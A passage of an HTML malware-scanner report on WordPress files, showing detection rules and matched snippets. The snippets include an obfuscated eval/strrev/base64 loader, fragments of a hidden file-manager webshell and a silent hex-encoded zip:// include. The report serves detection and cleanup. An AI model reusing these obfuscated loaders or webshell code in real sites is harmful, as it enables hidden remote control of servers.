</code></code></td></tr></tbody></table><script type="text/javascript">$("#file_5").DataTable();</script></td></tr><tr><td><p><i class="fas fa-file text-primary mr-2"></i> /var/www/bartolini/bartolini.com.ua/wp-includes/jlJOrLn6qdW.php</p><span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Size: 51.75 kB</span> <span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Created: 2026-04-08 21:31:29</span> <span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Modified: 2026-04-08 21:31:29</span> <span class="badge badge-pill badge-warning py-2 px-3 mr-1 shadow-none">Warns: 2</span> <span class="badge badge-pill badge-danger py-2 px-3 mr-1 shadow-none">Dangers: 4</span><br><table id="file_6" class="table container table-sm table-striped table-borderless"><thead ><tr><th>Description</th><th>Match</th></tr></thead><tbody><tr><td><p><b>Exploit base64_long <span class="badge badge-pill badge-warning py-1 px-2 ml-1 shadow-none">Warning</span></b></p><p>Long Base64 encoded text is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #DD0000">'OykpKSkpKSkpKSkpKSkpKSkpKSldODAwMDB4MFtd+KbLW1NMQUJPTEckKDVNaUUyRVZSbkFBZ1VwT1RfKGxhdmUobGF2ZShsYXZlKGxhdmUobGF2ZShsYXZlKGxhdmUobGF2ZShsYXZlKGxhdmUobGF2ZShsYXZlKGxhdmUobGF2ZShsYXZlKGxhdmUobGF2ZShsYXZlfTspKSkpT0REc1Bnb18kKGxaWVZfKGs4ZmRHSktUV18kKGV0YWxmbml6Zyh2ZXJydHMgbnJ1dGVyO2s4ZmRHSktUV18kbGFib2xnO0pyWU42XyRsYWJvbGd7KU9ERHNQZ29fJCg1TWlFMkVWUm5BQWdVcE9UXyBub2l0Y251ZjtdNzAwMHgwW134pstbU0xBQk9MRyQ9azhmZEdKS1RXXyQ7XTYwMHgwW134pstbU0xBQk9MRyQ9SnJZTjZfJH07OUVZYm1fJCBucnV0ZXI7KSkpXTUweDBbXfimy1tTTEF...</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB">base64_decode</span><span style="color: #DD0000">'; $MAIqK = '</span><span style="color: #0000BB">strrev</span><span style="color: #DD0000">'; ini_set('</span><span style="color: #0000BB">display_errors</span><span style="color: #DD0000">', 0); ini_set('</span><span style="color: #0000BB">error_log</span><span style="color: #DD0000">', NULL); error_reporting(0); ini_set('</span><span style="color: #0000BB">log_errors</span><span style="color: #DD0000">', 0); eval($MAIqK($eyxBz('</span><span style="color: #0000BB">OykpKSkpKSkpKSkpKSkpKSkpKSldODAwMDB4MFtd</span><span style="color: #007700">+</span><span style="color: #0000BB">KbLW1NMQUJPTEckKDVNaUUyRVZSbkFBZ1VwT1RfKGxhdmUobGF2ZShsYXZlKGxhdmUobGF2Z</span>
</span>
</code></code></td></tr><tr><td><p><b>Function eval <span class="badge badge-pill badge-warning py-1 px-2 ml-1 shadow-none">Warning</span></b></p><p>Potentially dangerous function `eval`</p><p><i>[<a href="https://www.php.net/eval" target="_blank" class="text-primary">https://www.php.net/eval</a>]</i></p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">eval(</span><span style="color: #0000BB">$MAIqK</span><span style="color: #007700">(</span><span style="color: #0000BB">$eyxBz</span><span style="color: #007700">(</span><span style="color: #DD0000">'OykpKSkpKSkpKSkpKSkpKSkpKSldODAwMDB4MFtd+KbLW1NMQUJPTEckKDVNaUUyRVZSbkFBZ1VwT1RfKGxhdmUobGF2ZShsYXZlKGxhdmUobGF2ZShsYXZlKGxhdmUobGF2ZShsYXZlKGxhdmUobGF2ZShsYXZlKGxhdmUobGF2ZShsYXZlKGxhdmUobGF2ZShsYXZlfTspKSkpT0REc1Bnb18kKGxaWVZfKGs4ZmRHSktUV18kKGV0YWxmbml6Zyh2ZXJydHMgbnJ1dGVyO2s4ZmRHSktUV18kbGFib2xnO0pyWU42XyRsYWJvbGd7KU9ERHNQZ29fJCg1TWlFMkVWUm5BQWdVcE9UXyBub2l0Y251ZjtdNzAwMHgwW134pstbU0xBQk9MRyQ9azhmZEdKS1RXXyQ7XTYwMHgwW134pstbU0xBQk9MRyQ9SnJZTjZfJH07OUVZYm1fJCBucnV0ZXI7KSkp...</span>
</span>
</code></code></td></tr><tr><td><p><b>Function strrev eval_strrev <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 1</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Encoded Function `eval`</p><p><i>[<a href="https://www.php.net/eval" target="_blank" class="text-primary">https://www.php.net/eval</a>]</i></p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB">LavE</span>
</span>
</code></code></td></tr><tr><td><p><b>Sign de12c454 <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 1</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Malware Signature (hash: de12c454)</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB">VJag</span>
</span>
</code></code></td></tr><tr><td><p><b>Sign f9dc0a55 <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Malware Signature (hash: f9dc0a55)</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #DD0000">'base64_decode'</span>
</span>
</code></code></td></tr></tbody></table><script type="text/javascript">$("#file_6").DataTable();</script></td></tr><tr><td><p><i class="fas fa-file text-primary mr-2"></i> /var/www/bartolini/bartolini.com.ua/wp-includes/assets/archives_1769473645.php</p><span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Size: 15.03 kB</span> <span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Created: 2026-01-27 02:27:46</span> <span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Modified: 2026-01-27 02:27:46</span> <span class="badge badge-pill badge-warning py-2 px-3 mr-1 shadow-none">Warns: 2</span> <span class="badge badge-pill badge-danger py-2 px-3 mr-1 shadow-none">Dangers: 22</span><br><table id="file_7" class="table container table-sm table-striped table-borderless"><thead ><tr><th>Description</th><th>Match</th></tr></thead><tbody><tr><td><p><b>Exploit double_var2 <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 108</span> <span class="badge badge-pill badge-warning py-1 px-2 ml-1 shadow-none">Warning</span></b></p><p>Double var technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">${</span><span style="color: #0000BB">$__</span><span style="color: #007700">}</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit double_var2 <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 55</span> <span class="badge badge-pill badge-warning py-1 px-2 ml-1 shadow-none">Warning</span></b></p><p>Double var technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">${</span><span style="color: #0000BB">$_</span><span style="color: #007700">}</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function() { if (</span><span style="color: #0000BB">confirm</span><span style="color: #007700">(</span><span style="color: #DD0000">'Delete?'</span><span style="color: #007700">)) </span><span style="color: #0000BB">_0x02</span><span style="color: #007700">(</span><span style="color: #0000BB">_0x4b12</span><span style="color: #007700">(</span><span style="color: #0000BB">0x17</span><span style="color: #007700">), </span><span style="color: #0000BB">this</span><span style="color: #007700">.</span><span style="color: #0000BB">getAttribute</span><span style="color: #007700">(</span><span style="color: #DD0000">'data-path'</span><span style="color: #007700">)); }); }); </span><span style="color: #0000BB">document</span><span style="color: #007700">.</span><span style="color: #0000BB">querySelectorAll</span><span style="color: #007700">(</span><span style="color: #DD0000">'.rename-btn'</span><span style="color: #007700">).forEach(</span><span style="color: #0000BB">_0x9b </span><span style="color: #007700">=> { </span><span style="color: #0000BB">_0x9b</span><span style="color: #007700">[</span><span style="color: #0000BB">_0x4b12</span><span style="color: #007700">(</span><span style="color: #0000BB">0xf</span><span style="color: #007700">)](</span><span style="color: #0000BB">_0x4b12</span><span style="color: #007700">(</span><span style="color: #0000BB">0x11</span><span style="color: #007700">), function() { const </span><span style="color: #0000BB">_0xname </span><span style="color: #007700">= </span><span style="color: #0000BB">prompt</span><span style="color: #007700">(</span><span style="color: #DD0000">'New name:'</span><span style="color: #007700">, </span><span style="color: #0000BB">this</span><span style="color: #007700">.</span><span style="color: #0000BB">getAttribute</span><span style="color: #007700">(</span><span style="color: #DD0000">'data-</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 12</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">get_absolute_root</span><span style="color: #007700">() {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 16</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">substr</span><span style="color: #007700">(</span><span style="color: #0000BB">$script_filename</span><span style="color: #007700">, </span><span style="color: #0000BB">0</span><span style="color: #007700">, </span><span style="color: #0000BB">$pos</span><span style="color: #007700">);}</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 172</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function() {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 175</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function(</span><span style="color: #0000BB">_0x1b</span><span style="color: #007700">, </span><span style="color: #0000BB">_0x2c</span><span style="color: #007700">) {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 176</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">_0x5f2e</span><span style="color: #007700">[</span><span style="color: #0000BB">_0x1b</span><span style="color: #007700">];</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 179</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function(</span><span style="color: #0000BB">_0x54</span><span style="color: #007700">, </span><span style="color: #0000BB">_0x32</span><span style="color: #007700">, </span><span style="color: #0000BB">_0x1a</span><span style="color: #007700">) {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 17</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">rtrim</span><span style="color: #007700">(</span><span style="color: #0000BB">str_replace</span><span style="color: #007700">(</span><span style="color: #DD0000">'\\'</span><span style="color: #007700">, </span><span style="color: #DD0000">'/'</span><span style="color: #007700">, </span><span style="color: #0000BB">$_SERVER</span><span style="color: #007700">[</span><span style="color: #DD0000">'DOCUMENT_ROOT'</span><span style="color: #007700">]), </span><span style="color: #DD0000">'/'</span><span style="color: #007700">);</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 22</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">displayPathItem</span><span style="color: #007700">(</span><span style="color: #0000BB">$title</span><span style="color: #007700">, </span><span style="color: #0000BB">$value</span><span style="color: #007700">) {print </span><span style="color: #DD0000">"<div class='path-nav'><strong></span><span style="color: #007700">{</span><span style="color: #0000BB">$title</span><span style="color: #007700">}</span><span style="color: #DD0000">:</strong>" </span><span style="color: #007700">. </span><span style="color: #0000BB">$value </span><span style="color: #007700">. </span><span style="color: #DD0000">"</div>"</span><span style="color: #007700">;}</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 25</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">PathCl</span><span style="color: #007700">(</span><span style="color: #0000BB">$path</span><span style="color: #007700">){</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 3</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">Result</span><span style="color: #007700">(</span><span style="color: #0000BB">$Int</span><span style="color: #007700">) {</span><span style="color: #0000BB">$I</span><span style="color: #007700">=array(</span><span style="color: #DD0000">'C'</span><span style="color: #007700">,</span><span style="color: #DD0000">'P'</span><span style="color: #007700">,</span><span style="color: #DD0000">'Q'</span><span style="color: #007700">,</span><span style="color: #DD0000">'T'</span><span style="color: #007700">,</span><span style="color: #DD0000">'U'</span><span style="color: #007700">,</span><span style="color: #DD0000">'M'</span><span style="color: #007700">,</span><span style="color: #DD0000">'V'</span><span style="color: #007700">,</span><span style="color: #DD0000">'h'</span><span style="color: #007700">,</span><span style="color: #DD0000">'E'</span><span style="color: #007700">,</span><span style="color: #DD0000">'L'</span><span style="color: #007700">,</span><span style="color: #DD0000">'l'</span><span style="color: #007700">,</span><span style="color: #DD0000">'0'</span><span style="color: #007700">,</span><span style="color: #DD0000">'K'</span><span style="color: #007700">,</span><span style="color: #DD0000">'8'</span><span style="color: #007700">,</span><span style="color: #DD0000">'C'</span><span style="color: #007700">,</span><span style="color: #DD0000">'l'</span><span style="color: #007700">,</span><span style="color: #DD0000">'a'</span><span style="color: #007700">,</span><span style="color: #DD0000">'U'</span><span style="color: #007700">,</span><span style="color: #DD0000">'D'</span><span style="color: #007700">,</span><span style="color: #DD0000">'e'</span><span style="color: #007700">,</span><span style="color: #DD0000">'4'</span><span style="color: #007700">,</span><span style="color: #DD0000">'I'</span><span style="color: #007700">,</span><span style="color: #DD0000">'m'</span><span style="color: #007700">,</span><span style="color: #DD0000">'1'</span><span style="color: #007700">,</span><span style="color: #DD0000">'5'</span><span style="color: #007700">,</span><span style="color: #DD0000">'s'</span><span style="color: #007700">,</span><span style="color: #DD0000">'b'</span><span style="color: #007700">,</span><span style="color: #DD0000">'R'</span><span style="color: #007700">,</span><span style="color: #DD0000">'Y'</span><span style="color: #007700">,</span><span style="color: #DD0000">'O'</span><span style="color: #007700">,</span><span style="color: #DD0000">'u'</span><span style="color: #007700">,</span><span style="color: #DD0000">'W'</span><span style="color: #007700">,</span><span style="color: #DD0000">'X'</span><span style="color: #007700">,</span><span style="color: #DD0000">'Z'</span><span style="color: #007700">,</span><span style="color: #DD0000">'+'</span><span style="color: #007700">,</span><span style="color: #DD0000">'c'</span><span style="color: #007700">,</span><span style="color: #DD0000">'@'</span><span style="color: #007700">,</span><span style="color: #DD0000">'d'</span><span style="color: #007700">,</span><span style="color: #DD0000">'3'</span><span style="color: #007700">,</span><span style="color: #DD0000">'r'</span><span style="color: #007700">,</span><span style="color: #DD0000">'F'</span><span style="color: #007700">,</span><span style="color: #DD0000">')'</span><span style="color: #007700">,</span><span style="color: #DD0000">'B'</span><span style="color: #007700">,</span><span style="color: #DD0000">'y'</span><span style="color: #007700">,</span><span style="color: #DD0000">'C'</span><span style="color: #007700">,</span><span style="color: #DD0000">'J'</span><span style="color: #007700">,</span><span style="color: #DD0000">'q'</span><span style="color: #007700">,</span><span style="color: #DD0000">'G'</span><span style="color: #007700">,</span><span style="color: #DD0000">'#'</span><span style="color: #007700">,</span><span style="color: #DD0000">'S'</span><span style="color: #007700">,</span><span style="color: #DD0000">'o'</span><span style="color: #007700">,</span><span style="color: #DD0000">'H'</span><span style="color: #007700">,</span><span style="color: #DD0000">'4'</span><span style="color: #007700">,</span><span style="color: #DD0000">'A'</span><span style="color: #007700">,</span><span style="color: #DD0000">'i'</span><span style="color: #007700">,</span><span style="color: #DD0000">'j'</span><span style="color: #007700">,</span><span style="color: #DD0000">'t'</span><span style="color: #007700">,</span><span style="color: #DD0000">'v'</span><span style="color: #007700">,</span><span style="color: #DD0000">'w'</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 40</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">implode</span><span style="color: #007700">(</span><span style="color: #DD0000">' / '</span><span style="color: #007700">, </span><span style="color: #0000BB">$breadcrumbs</span><span style="color: #007700">);</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 43</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">getPermissions</span><span style="color: #007700">(</span><span style="color: #0000BB">$path</span><span style="color: #007700">) {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 47</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #DD0000">"</span><span style="color: #0000BB">$readable</span><span style="color: #DD0000"> </span><span style="color: #0000BB">$writable</span><span style="color: #DD0000"> </span><span style="color: #0000BB">$executable</span><span style="color: #DD0000">"</span><span style="color: #007700">;}</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 49</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">formatFileSize</span><span style="color: #007700">(</span><span style="color: #0000BB">$bytes</span><span style="color: #007700">) {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 50</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">round</span><span style="color: #007700">(</span><span style="color: #0000BB">$bytes </span><span style="color: #007700">/ </span><span style="color: #0000BB">1073741824</span><span style="color: #007700">, </span><span style="color: #0000BB">2</span><span style="color: #007700">) . </span><span style="color: #DD0000">' GB'</span><span style="color: #007700">; }</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 51</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">round</span><span style="color: #007700">(</span><span style="color: #0000BB">$bytes </span><span style="color: #007700">/ </span><span style="color: #0000BB">1048576</span><span style="color: #007700">, </span><span style="color: #0000BB">2</span><span style="color: #007700">) . </span><span style="color: #DD0000">' MB'</span><span style="color: #007700">; }</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 52</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">round</span><span style="color: #007700">(</span><span style="color: #0000BB">$bytes </span><span style="color: #007700">/ </span><span style="color: #0000BB">1024</span><span style="color: #007700">, </span><span style="color: #0000BB">2</span><span style="color: #007700">) . </span><span style="color: #DD0000">' KB'</span><span style="color: #007700">; }</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 53</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">$bytes </span><span style="color: #007700">. </span><span style="color: #DD0000">' By'</span><span style="color: #007700">; }</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 62</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">renderFileList</span><span style="color: #007700">(</span><span style="color: #0000BB">$GetPath</span><span style="color: #007700">) {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 87</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">LoadFile</span><span style="color: #007700">(</span><span style="color: #0000BB">$GetPath</span><span style="color: #007700">) {</span>
</span>
</code></code></td></tr><tr><td><p><b>Sign ae7830db <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 6</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Malware Signature (hash: ae7830db)</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB">Y2hy</span>
</span>
</code></code></td></tr></tbody></table><script type="text/javascript">$("#file_7").DataTable();</script></td></tr><tr><td><p><i class="fas fa-file text-primary mr-2"></i> /var/www/bartolini/bartolini.com.ua/wp-includes/blocks/comment-reply-link/comment-reply-link/cache.php</p><span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Size: 374.00 B</span> <span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Created: 2026-01-26 08:41:39</span> <span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Modified: 2026-01-26 08:41:39</span> <span class="badge badge-pill badge-warning py-2 px-3 mr-1 shadow-none">Warns: 1</span> <span class="badge badge-pill badge-danger py-2 px-3 mr-1 shadow-none">Dangers: 3</span><br><table id="file_8" class="table container table-sm table-striped table-borderless"><thead ><tr><th>Description</th><th>Match</th></tr></thead><tbody><tr><td><p><b>Exploit double_var2 <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 1</span> <span class="badge badge-pill badge-warning py-1 px-2 ml-1 shadow-none">Warning</span></b></p><p>Double var technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">${</span><span style="color: #0000BB">$glYGx</span><span style="color: #007700">[</span><span style="color: #0000BB">0</span><span style="color: #007700">]}</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit hex_char <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 1</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Hex char is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">\</span><span style="color: #0000BB">x5f</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit silence_inclusion <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 1</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>LFI (Local File Inclusion), through a silent inclusion, allow remote attackers to inject and execute arbitrary commands or code on the target machine</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">@include </span><span style="color: #DD0000">"\x7a\x69\x70\x3a\x2f\x2f\x6d\x6b\x76\x5f\x36\x39\x37\x37\x30\x63\x61\x33\x33\x39\x38\x30\x35\x2e\x7a\x69\x70\x23\x63\x5f\x36\x39\x37\x37\x30\x63\x61\x33\x33\x39\x38\x30\x35\x2e\x74\x6d\x70"</span>
</span>
</code></code></td></tr><tr><td><p><b>Sign 5aabe84e <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Malware Signature (hash: 5aabe84e)</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">include </span><span style="color: #DD0000">"zip:</span>
</span>
</code></code></td></tr></tbody></table><script type="text/javascript">$("#file_8").DataTable();</script></td></tr><tr><td><p><i class="fas fa-file text-primary mr-2"></i> /var/www/bartolini/bartolini.com.ua/wp-includes/blocks/comment-reply-link/comment-reply-link/index.php</p><span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Size: 428.00 B</span> <span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Created: 2026-01-26 08:41:39</span> <span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Modified: 2026-01-26 08:41:39</span> <span class="badge badge-pill badge-warning py-2 px-3 mr-1 shadow-none">Warns: 1</span> <span class="badge badge-pill badge-danger py-2 px-3 mr-1 shadow-none">Dangers: 1</span><br><table id="file_9" class="table container table-sm table-striped table-borderless"><thead ><tr><th>Description</th><th>Match</th></tr></thead><tbody><tr><td><p><b>Exploit double_var2 <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 1</span> <span class="badge badge-pill badge-warning py-1 px-2 ml-1 shadow-none">Warning</span></b></p><p>Double var technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">${</span><span style="color: #0000BB">$glYGx</span><span style="color: #007700">[</span><span style="color: #0000BB">0</span><span style="color: #007700">]}</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit hex_char <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 1</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Hex char is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">\</span><span style="color: #0000BB">x5f</span>
</span>
